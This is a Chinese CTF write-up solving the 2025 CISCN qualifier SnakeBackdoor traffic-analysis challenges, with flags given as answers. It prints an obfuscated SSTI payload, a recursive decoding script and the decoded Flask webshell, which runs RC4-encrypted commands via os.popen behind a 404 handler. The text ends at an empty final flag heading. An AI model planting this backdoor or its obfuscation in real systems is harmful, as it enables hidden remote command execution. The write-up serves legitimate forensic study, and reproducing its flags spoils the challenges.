时隔一年再次参加国赛初赛，相比去年刚入坑CTF只做了3道签到也算是有点进步吧
以下WP中流量分析的 SnakeBackdoor-5 和 SnakeBackdoor-6 为赛后复现
题目见 CTF-Archives/2025-CCB-CISCN-Quals

流量分析

近期发现公司网络出口出现了异常的通信，现需要通过分析出口流量包，对失陷服务器进行定位。现在需要你从网络攻击数据包中找出漏洞攻击的会话，分析会话编写exp或数据包重放，查找服务器上安装的后门木马，然后分析木马外联地址和通信密钥以及木马启动项位置。

SnakeBackdoor-1

Challenge

攻击者爆破成功的后台密码是什么？，结果提交形式：flag{xxxxxxxxx}

Solution

筛选 http 流量，倒着看，找到最后一条 /admin/login 的流量，302 跳转了说明密码正确了

FLAG

text

1flag{zxcvbnm123}

SnakeBackdoor-2

Challenge

攻击者通过漏洞利用获取Flask应用的 SECRET_KEY 是什么，结果提交形式：flag{xxxxxxxxxx}

Solution

直接搜索 SECRET_KEY

FLAG

text

1flag{c6242af0-6891-4510-8432-e1cdf051f160}

SnakeBackdoor-3

Challenge

攻击者植入的木马使用了加密算法来隐藏通讯内容。请分析注入Payload，给出该加密算法使用的密钥字符串(Key) ，结果提交形式：flag{xxxxxxxx}

Solution

从第二问得知漏洞利用点在 /admin/preview，是 SSTI 注入preview_content

接着追踪下一条 /admin/preview 的流量就能找到通过漏洞植入的木马

这段 payload 的关键部分如下：

python

1import base64; exec(base64.b64decode('XyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpOwpleGVjKChfKShiJz1jNENVM3hQKy8vdlB6ZnR2OGdyaTYzNWEwVDFyUXZNbEtHaTNpaUJ3dm02VEZFdmFoZlFFMlBFajdGT2NjVElQSThUR3FaTUMrbDlBb1lZR2VHVUFNY2Fyd1NpVHZCQ3YzN3lzK04xODVOb2NmbWpFL2ZPSGVpNE9uZTBDTDVUWndKb3BFbEp4THI5VkZYdlJsb2E1UXZyamlUUUtlRytTR2J5Wm0rNXpUay9WM25aMEc2TmVhcDdIdDZudSthY3hxc3Ivc2djNlJlRUZ4ZkVlMnAzMFlibXl5aXMzdWFWMXArQWowaUZ2cnRTc01Va2hKVzlWOVMvdE8rMC82OGdmeUtNL3lFOWhmNlM5ZUNEZFFwU3lMbktrRGlRazk3VFV1S0RQc09SM3BRbGRCL1VydmJ0YzRXQTFELzljdFpBV2NKK2pISkwxaytOcEN5dktHVmh4SDhETEw3bHZ1K3c5SW5VLzl6dDFzWC9Uc1VSVjdWMHhFWFpOU2xsWk1acjFrY0xKaFplQjhXNTl5bXhxZ3FYSkpZV0ppMm45NmhLdFNhMmRhYi9GMHhCdVJpWmJUWEZJRm1ENmtuR3ovb1B4ZVBUenVqUHE1SVd0OE5abXZ5TTVYRGcvTDhKVS9tQzRQU3ZYQStncWV1RHhMQ2x6Uk5ESEpVbXZ0a2FMYkp2YlpjU2c3VGdtN1VTZUpXa0NRb2pTaStJTklFajVjTjErRkZncEtSWG40Z1I5eXAzL1Y3OVduU2VFRklPNkM0aGNKYzRtd3BrKzA5dDF5dWU0K21BbGJobHhuWE0xUGZrK3NHQm1hVUZFMWtFak9wbmZHbnFzVithdU9xakpnY0RzaXZJZCt3SFBIYXp0NU1WczRySFJoWUJPQjZ5WGp1R1liRkhpM1hLV2hiN0FmTVZ2aHg3RjlhUGpObUlpR3FCVS9oUkZVdU1xQkNHK1ZWVVZBYmQ1cEZEVFpKM1A4d1V5bTZRQUFZUXZ4RytaSkRSU1F5cE9oWEsvTDRlRkZ0RXppdWZaUFN5cllQSldKbEFRc0RPK2RsaTQ2Y24xdTVBNUh5cWZuNHZ3N3pTcWUrVlVRL1JpL0tudjBwUW9XSDFkOWRHSndEZnFtZ3ZuS2krZ05SdWdjZlVqRzczVjZzL3RpaGx0OEIyM0t2bUp6cWlMUHptdWhyMFJGVUpLWmpHYTczaUxYVDRPdmxoTFJhU2JUVDR0cS9TQ2t0R1J5akxWbVNqMmtyMEdTc3FUamxMMmw2Yy9jWEtXalJNdDFrTUNtQ0NUVithSmU0bnB2b0I5OU9NbktuWlI0WXM1MjZtVEZUb1N3YTVqbXhCbWtSWUNtQTgyR0ZLN2FrNmJJUlRmRE1zV0dzWnZBRVh2M1BmdjVOUnpjSUZOTzN0YlFrZUIvTElWT1c1TGZBa21SNjgvNnpyTDBEWm9QanpGWkk1VkxmcTBydjlDd1VlSmtSM1BIY3VqKytkL2xPdms4L2gzSHpTZ1lUR0N3bDF1ano4aDRvVWlQeUdUNzROamJZN2ZKOHZVSHFOeitaVmZPdFZ3L3ozUk11cVNVekVBS3JqY1UyRE5RZWhCMG9ZN3hJbE9UOXU5QlQ0Uk9vREZvKzVaRjZ6Vm9IQTRlSWNrWFVPUDN5cFF2NXBFWUcrMHBXNE15SG1BUWZzT2FXeU1kZk1vcWJ3L005b0ltZEdLZEt5MVdxM2FxK3QreHV5VmROQVFNaG9XMkE3elF6b2I4WEdBM0c4VnVvS0hHT2NjMjVIQ2IvRlllU3hkd3lJZWRBeGtsTExZTUJIb2pUU3BEMWRFeG96ZGk4OUdpa2h6MzMwNW5kVG1FQ3YwWm9VT0hhY25xdFVVaEpseTdWZ3ZYK0psYXdBWTlvck5QVW1aTTdRS2JkT2tUZi9vOGFRbFM1RmUveFFrT01KR200TlhxTGVoaVJJYjkyNXNUZlZ4d29OZlA1djFNR2xhcllNaWZIbDJyRXA1QzcxaXBGanBBR2FFcDluUmowSmdFYTRsU1R1WWVWWHdxYlpRVDNPZlF2Z3QvYkhKbEFndXFTV3lzR2hxaElUSllNNlQxMG03MUppd2ZRSDVpTFhINVhiRms1M1FHY0cyY0FuRnJXeTcweEV2YWJtZjB1MGlrUXdwVTJzY1A4TG9FYS9DbEpuUFN1V3dpY01rVkxya1pHcW5CdmJrNkpUZzdIblQwdkdVY1Y2a2ZmSUw2Q0szYkUxRnkwUjZzbCtVUG9ZdmprZ1NJM1ViZkQ2N2JSeEl4ZWdCcFlUenlDRHpQeXRTRSthNzdzZHhzZ2hMcFVDNWh4ejRaZVhkeUlyYm1oQXFRdzVlRW5CdUFTRTVxVE1Ka1RwLy9oa3krZFQycGNpT0JZbi9BQ1NMeHByTFowQXkxK3pobCtYeVY5V0ZMNE5nQm9IMzRidmt4SDM2bmN0c3pvcFdHUHlkMTRSaVM0ZDBFcU5vY3F2dFd1M1l4a05nUCs4Zk0vZC9CMGlreEt4aC9HamttUVhhU1gvQis0MFU0YmZTYnNFSnBWT3NUSFR5NnUwTnI2N1N3N0J2Und1VnZmVDAvOGo3M2dZSEJPMmZHU0lKNDdBcllWbTIrTHpSVDBpSDVqN3lWUm1wdGNuQW44S2t4SjYzV0JHYjd1M2JkK0QrM3lsbm0xaDRBUjdNR042cjZMeHBqTmxBWDExd2EvWEIxek44Y1dVTm5DM1ZjemZ3VUV3UGZpNWR5bzluRUM1V085VW03OFdLUnJtM2M0OEl2VFVoZ2ROZVFFRG9zSWZoTVNtaWtFbHVRWDhMY0NSY0s5ZVVUODVidnI1SjVyekViK0R1aUdZeURGRzdQWmVmdkliM3czM3UycTh6bHhsdFdDU3RjNU80cThpV3JWSTd0YVpIeG93VHc1ekpnOVRkaEJaK2ZRclF0YzB5ZHJCbHZBbG5ZMTB2RUNuRlVCQSt5MWxXc1ZuOGNLeFVqVGRhdGk0QUYzaU0vS3VFdFE2Wm44Ykk0TFl3TWxHbkNBMVJHODhKOWw3RzRkSnpzV3I5eE9pRDhpTUkyTjFlWmQvUVV5NDNZc0lMV3g4MHlpQ3h6K0c0YlhmMnFOUkZ2Tk9hd1BTbnJwdjZRMG9GRVpvamx1UHg3Y09VMjdiQWJncHdUS28wVlV5SDZHNCt5c3ZpUXpVN1NSZDUxTEdHM1U2Y1QwWURpZFFtejJld3Ria2tLY0dWY1N5WU9lQ2xWNkNSejZiZEYvR20zVDIrUTkxNC9sa1piS3gxOVduWDc4cit4dzZicGp6V0xyMEUxZ2puS0NWeFcwWFNud2UraUc5ZGtHOG5DRmZqVWxoZFRhUzFnSjdMRnNtVWpuOHUvdlJRYlJMdy95NjZJcnIveW5LT0N6Uk9jZ3JuREZ4SDN6M0pUUVFwVGlEcGV5elJzRjRTbkdCTXY1SGJyK2NLNllUYTRNSWJmemo1VGkzRk1nSk5xZ0s1WGs5aHNpbEdzVTZ0VWJucDZTS2lKaFV2SjhicXluVU1Fem5kbCtTK09WUkNhSDJpSmw4VTNXanlCNjhScTRIQVRrL2NLN0xrSkhITWpDM1c3ZFRtT0JwZm9XTVZFTGFMK1JrcVdZdjBDcFc1cUVOTGxuT1BCckdhR05lSVphaHpibnJ1RVBJSVhHa0d6MWZFNWQ0Mk1hS1pzQ1VZdDF4WGlhaTkrY2JLR2ovZDBsSUNxN3VjN2JSaEVCeDQ2RHlCWFR6MWdmSm5UMnVyNng0QXZiNXdZMnBjWXJjRDJPUjZBaWtNdm0yYzBiaGFiSkI2bzBEaE9OSjRsQ3htS2RHQnp1d3J0czF1MEQyeXVvMzd5TExmc0dEdXllcE53OGx5VE5jMm55aENWQmZXMjNEbkJRbVdjMVFMQ29ScHBWaGpLWHdPcE9ES084UjhZSG5RTStyTGs2RU9hYkNkR0s1N2lSek1jVDN3YzQzNmtWbUhYRGNJMFpzWUdZNWFJQzVEYmRXalV0Mlp1VTBMbXVMd3pDVFM5OXpoT29POERLTnFiSzRiSU5MeUFJMlg5Mjh4aWIraG1JT3FwM29TZ0MyUGRGYzh5cXRoTjlTNTVvbXRleDJ4a0VlOENZNDhDNno0SnRxVnRxaFBRV1E4a3RlNnhsZXBpVllDcUliRTJWZzRmTi8vTC9mZi91Ly85cDRMejd1cTQ2eVdlbmtKL3g5MGovNW1FSW9yczVNY1N1Rmk5ZHlneXlSNXdKZnVxR2hPZnNWVndKZScpKQ==')）

把 exec 改成 print 运行得到：

python

1_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));\nexec((_)(b'=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'))

继续把 exec 改成 print 运行得到：

python

1exec((_)(b'=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'))

看起来是递归加密，编写脚本批量解：

python

1import base642import zlib3import re4 5code = """6exec((_)(b'=c4CU3xP+//vPzftv8gri635a0T1rQvMlKGi3iiBwvm6TFEvahfQE2PEj7FOccTIPI8TGqZMC+l9AoYYGeGUAMcarwSiTvBCv37ys+N185NocfmjE/fOHei4One0CL5TZwJopElJxLr9VFXvRloa5QvrjiTQKeG+SGbyZm+5zTk/V3nZ0G6Neap7Ht6nu+acxqsr/sgc6ReEFxfEe2p30Ybmyyis3uaV1p+Aj0iFvrtSsMUkhJW9V9S/tO+0/68gfyKM/yE9hf6S9eCDdQpSyLnKkDiQk97TUuKDPsOR3pQldB/Urvbtc4WA1D/9ctZAWcJ+jHJL1k+NpCyvKGVhxH8DLL7lvu+w9InU/9zt1sX/TsURV7V0xEXZNSllZMZr1kcLJhZeB8W59ymxqgqXJJYWJi2n96hKtSa2dab/F0xBuRiZbTXFIFmD6knGz/oPxePTzujPq5IWt8NZmvyM5XDg/L8JU/mC4PSvXA+gqeuDxLClzRNDHJUmvtkaLbJvbZcSg7Tgm7USeJWkCQojSi+INIEj5cN1+FFgpKRXn4gR9yp3/V79WnSeEFIO6C4hcJc4mwpk+09t1yue4+mAlbhlxnXM1Pfk+sGBmaUFE1kEjOpnfGnqsV+auOqjJgcDsivId+wHPHazt5MVs4rHRhYBOB6yXjuGYbFHi3XKWhb7AfMVvhx7F9aPjNmIiGqBU/hRFUuMqBCG+VVUVAbd5pFDTZJ3P8wUym6QAAYQvxG+ZJDRSQypOhXK/L4eFFtEziufZPSyrYPJWJlAQsDO+dli46cn1u5A5Hyqfn4vw7zSqe+VUQ/Ri/Knv0pQoWH1d9dGJwDfqmgvnKi+gNRugcfUjG73V6s/tihlt8B23KvmJzqiLPzmuhr0RFUJKZjGa73iLXT4OvlhLRaSbTT4tq/SCktGRyjLVmSj2kr0GSsqTjlL2l6c/cXKWjRMt1kMCmCCTV+aJe4npvoB99OMnKnZR4Ys526mTFToSwa5jmxBmkRYCmA82GFK7ak6bIRTfDMsWGsZvAEXv3Pfv5NRzcIFNO3tbQkeB/LIVOW5LfAkmR68/6zrL0DZoPjzFZI5VLfq0rv9CwUeJkR3PHcuj++d/lOvk8/h3HzSgYTGCwl1ujz8h4oUiPyGT74NjbY7fJ8vUHqNz+ZVfOtVw/z3RMuqSUzEAKrjcU2DNQehB0oY7xIlOT9u9BT4ROoDFo+5ZF6zVoHA4eIckXUOP3ypQv5pEYG+0pW4MyHmAQfsOaWyMdfMoqbw/M9oImdGKdKy1Wq3aq+t+xuyVdNAQMhoW2A7zQzob8XGA3G8VuoKHGOcc25HCb/FYeSxdwyIedAxklLLYMBHojTSpD1dExozdi89Gikhz3305ndTmECv0ZoUOHacnqtUUhJly7VgvX+JlawAY9orNPUmZM7QKbdOkTf/o8aQlS5Fe/xQkOMJGm4NXqLehiRIb925sTfVxwoNfP5v1MGlarYMifHl2rEp5C71ipFjpAGaEp9nRj0JgEa4lSTuYeVXwqbZQT3OfQvgt/bHJlAguqSWysGhqhITJYM6T10m71JiwfQH5iLXH5XbFk53QGcG2cAnFrWy70xEvabmf0u0ikQwpU2scP8LoEa/ClJnPSuWwicMkVLrkZGqnBvbk6JTg7HnT0vGUcV6kffIL6CK3bE1Fy0R6sl+UPoYvjkgSI3UbfD67bRxIxegBpYTzyCDzPytSE+a77sdxsghLpUC5hxz4ZeXdyIrbmhAqQw5eEnBuASE5qTMJkTp//hky+dT2pciOBYn/ACSLxprLZ0Ay1+zhl+XyV9WFL4NgBoH34bvkxH36nctszopWGPyd14RiS4d0EqNocqvtWu3YxkNgP+8fM/d/B0ikxKxh/GjkmQXaSX/B+40U4bfSbsEJpVOsTHTy6u0Nr67Sw7BvRwuVvfT0/8j73gYHBO2fGSIJ47ArYVm2+LzRT0iH5j7yVRmptcnAn8KkxJ63WBGb7u3bd+D+3ylnm1h4AR7MGN6r6LxpjNlAX11wa/XB1zN8cWUNnC3VczfwUEwPfi5dyo9nEC5WO9Um78WKRrm3c48IvTUhgdNeQEDosIfhMSmikEluQX8LcCRcK9eUT85bvr5J5rzEb+DuiGYyDFG7PZefvIb3w33u2q8zlxltWCStc5O4q8iWrVI7taZHxowTw5zJg9TdhBZ+fQrQtc0ydrBlvAlnY10vECnFUBA+y1lWsVn8cKxUjTdati4AF3iM/KuEtQ6Zn8bI4LYwMlGnCA1RG88J9l7G4dJzsWr9xOiD8iMI2N1eZd/QUy43YsILWx80yiCxz+G4bXf2qNRFvNOawPSnrpv6Q0oFEZojluPx7cOU27bAbgpwTKo0VUyH6G4+ysviQzU7SRd51LGG3U6cT0YDidQmz2ewtbkkKcGVcSyYOeClV6CRz6bdF/Gm3T2+Q914/lkZbKx19WnX78r+xw6bpjzWLr0E1gjnKCVxW0XSnwe+iG9dkG8nCFfjUlhdTaS1gJ7LFsmUjn8u/vRQbRLw/y66Irr/ynKOCzROcgrnDFxH3z3JTQQpTiDpeyzRsF4SnGBMv5Hbr+cK6YTa4MIbfzj5Ti3FMgJNqgK5Xk9hsilGsU6tUbnp6SKiJhUvJ8bqynUMEzndl+S+OVRCaH2iJl8U3WjyB68Rq4HATk/cK7LkJHHMjC3W7dTmOBpfoWMVELaL+RkqWYv0CpW5qENLlnOPBrGaGNeIZahzbnruEPIIXGkGz1fE5d42MaKZsCUYt1xXiai9+cbKGj/d0lICq7uc7bRhEBx46DyBXTz1gfJnT2ur6x4Avb5wY2pcYrcD2OR6AikMvm2c0bhabJB6o0DhONJ4lCxmKdGBzuwrts1u0D2yuo37yLLfsGDuyepNw8lyTNc2nyhCVBfW23DnBQmWc1QLCoRppVhjKXwOpODKO8R8YHnQM+rLk6EOabCdGK57iRzMcT3wc436kVmHXDcI0ZsYGY5aIC5DbdWjUt2ZuU0LmuLwzCTS99zhOoO8DKNqbK4bINLyAI2X928xib+hmIOqp3oSgC2PdFc8yqthN9S55omtex2xkEe8CY48C6z4JtqVtqhPQWQ8kte6xlepiVYCqIbE2Vg4fN//L/ff/u//9p4Lz7uq46yWenkJ/x90j/5mEIors5McSuFi9dygyyR5wJfuqGhOfsVVwJe'))7"""8 9# 单层的解密逻辑10def decrypt_(encrypted_b64_data):11    try:12        return zlib.decompress(base64.b64decode(encrypted_b64_data[::-1])).decode('utf-8')13    except Exception as e:14        return None15 16# 递归解密17def decrypt(code):18    current = code19    layer = 020 21    while True:22        match = re.search(r"b'([^']+)'", current)23        if match:24            layer += 125            payload = match.group(1)26            next_layer = decrypt_(payload.encode('utf-8'))27            if next_layer:28                current = next_layer29            else:30                break31        else:32            break33 34    return current35 36print(decrypt(code))

运行解密得到：

python

1global exc_class2global code3import os,binascii4exc_class, code = app._get_exc_class_and_code(404)5RC4_SECRET = b'v1p3r_5tr1k3_k3y'6def rc4_crypt(data: bytes, key: bytes) -> bytes:7        S = list(range(256))8        j = 09        for i in range(256):10                j = (j + S[i] + key[i % len(key)]) % 25611                S[i], S[j] = S[j], S[i]12        i = j = 013        res = bytearray()14        for char in data:15                i = (i + 1) % 25616                j = (j + S[i]) % 25617                S[i], S[j] = S[j], S[i]18                res.append(char ^ S[(S[i] + S[j]) % 256])19        return bytes(res)20def backdoor_handler():21        if request.headers.get('X-Token-Auth') != '3011aa21232beb7504432bfa90d32779':22                return "Error"23        enc_hex_cmd = request.form.get('data')24        if not enc_hex_cmd:25                return ""26        try:27                enc_cmd = binascii.unhexlify(enc_hex_cmd)28                cmd = rc4_crypt(enc_cmd, RC4_SECRET).decode('utf-8', errors='ignore')29                output_bytes = getattr(os, 'popen')(cmd).read().encode('utf-8', errors='ignore')30                enc_output = rc4_crypt(output_bytes, RC4_SECRET)31                return binascii.hexlify(enc_output).decode()32        except:33                return "Error"34app.error_handler_spec[None][code][exc_class]=lambda error: backdoor_handler()

FLAG

text

